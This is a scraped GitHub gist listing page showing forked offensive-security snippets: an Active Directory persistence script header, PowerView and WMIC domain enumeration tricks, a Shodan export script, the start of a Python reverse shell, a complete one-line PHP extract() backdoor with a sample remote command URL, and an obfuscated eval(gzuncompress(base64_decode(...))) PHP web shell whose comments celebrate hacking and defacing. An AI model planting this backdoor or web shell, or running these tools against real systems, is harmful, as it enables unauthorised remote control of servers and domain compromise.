Skip to content

Instantly share code, notes, and snippets.

View iamtutu's full-sized avatar

iamtutu iamtutu

View GitHub Profile
@iamtutu
iamtutu / userAccountControl.ps1
Created January 18, 2022 05:26 — forked from netbiosX/userAccountControl.ps1
PowerShell script to automate domain persistence via the userAccountControl active directory attribute.
function Execute-userAccountControl
{
[CmdletBinding()]
param
(
[System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
[System.String]$ComputerName = 'Pentestlab',
[System.String]$OSVersion = '10.0 (18363)',
[System.String]$OS = 'Windows 10 Enterprise',
[System.String]$DNSName = "$ComputerName.$DomainFQDN",
@iamtutu
iamtutu / install cfssl
Created May 28, 2021 19:53 — forked from guoyoujin/install cfssl
linux install cfssl
source:
https://pkg.cfssl.org/
install:
$ curl -s -L -o /bin/cfssl https://pkg.cfssl.org/R1.2/cfssl_linux-amd64
$ curl -s -L -o /bin/cfssljson https://pkg.cfssl.org/R1.2/cfssljson_linux-amd64
$ curl -s -L -o /bin/cfssl-certinfo https://pkg.cfssl.org/R1.2/cfssl-certinfo_linux-amd64
$ chmod +x /bin/cfssl*
@iamtutu
iamtutu / PowerView-2.0-tricks.ps1
Created October 1, 2019 14:17 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
@iamtutu
iamtutu / PowerView-3.0-tricks.ps1
Created October 1, 2019 14:17 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@iamtutu
iamtutu / infosec_newbie.md
Created December 7, 2018 10:15 — forked from mubix/infosec_newbie.md
How to start in Infosec
@iamtutu
iamtutu / wmic_cmds.txt
Created October 2, 2018 10:21 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@iamtutu
iamtutu / simple-export.py
Created December 5, 2017 07:04 — forked from achillean/simple-export.py
A simple script to search Shodan and output the results as JSON-encoded banners; each line corresponds to a single banner.
#!/usr/bin/env python
"""
A simple script to search Shodan and output the results as JSON-encoded banners;
each line corresponds to a single banner.
Warning: This will use up query credits because it pages through the results!
Usage: python simple-export.py <search query>
"""
# Install via "easy_install shodan"
@iamtutu
iamtutu / simple.py
Created November 1, 2017 13:55 — forked from gdamjan/simple.py
Reverse shell in Python
import socket, os, sys
def daemonize():
pid = os.fork()
if pid > 0:
sys.exit(0) # Exit first parent
pid = os.fork()
if pid > 0:
sys.exit(0) # Exit second parent
@iamtutu
iamtutu / backup.php
Last active October 24, 2017 10:01 — forked from leonjza/backup.php
PHP extract() Backdoor RCE | Sample usage: foo.bar/backup.php?ctime=system&atime=ls -lah
<?php extract($_REQUEST); @die($ctime($atime));
@iamtutu
iamtutu / gist:ba04f1dff7016658c20097a358f5ccb7
Created October 20, 2017 00:41
Encoded DM_5HELL PHP Shell Script
<?php
/* NO LEAKED NO DJANCOEX NO FUCK3R */
/* THIS IS PHP WEB SHELL PRIVATE OF GRUP FB D'MASTERPIECE */
/* CODED FIRST BY OM KETEK B374K SHELL */
/* RECODED BY ANDRIPZF DM5HELL PRIV9 2013 */
/* AMATERASU VERSION GO TO HELL */
/* HAPPY HACKING & DEFACING */
/* THX TO ALL MUSLIM HACKER, ALL INDONESIA HACKER & DEFACER */
eval(gzuncompress(base64_decode("eNrsvWl34kiyMPy55pz5D2qu72APtgViryq7W4AAsQgQYhHdfXyEFiTQhhYEzO3//mamJBC2y+VePHfOfR9Xtw25RERGRkZEZkZm/v1vV4LvqU+24LrYA5YipGxWKeSVbLmay+WLRamQK+aUXL5KFBWFqBKpL9jf/3YlWtZGk59Uy3ee5L2tOTKoSxS+oCzdciCk/wKAlGw2BRMlWRF83XsSRE+zTJCbbmq67PYFMw2yfwLZmilfp8dUr/k0JLl2+hZ7emrSPerp6QYU0JRrzPUc23Kvr57GFDul2J/TbY4bPk3AtyeyRTFc+tfbdMuyVrqcvsF+eHjAFEF3ZewG+xemyoIkO9eoBp67z2KFbAFjLA9rWr4ppW++YPJe875gv/39b/DfT67suoDMJ9cTHO8aEvCT7DiW8+TItuV4mrm6zqJUzdSeXNm7TofZurVK3zKTXu8yEyQ/oQJu+vZZPUPYA/7Jog/Z8uRphhwXAdno+5OuGZp3fU40hJUmPm19y5PdJ8c3YaEoO2YjYM+YHjCAiendfaGYvsjkaK5HwaxG/6nYlnUdZcN/kMur5xhWtnh9A7j497/96+9/U3wz7EDQGZrt6oKrgiKC4wiH6yv0B7LbkT3fMTHtec6PGPoA4NvX6ZcQAE1xyc8XCGIAqIOu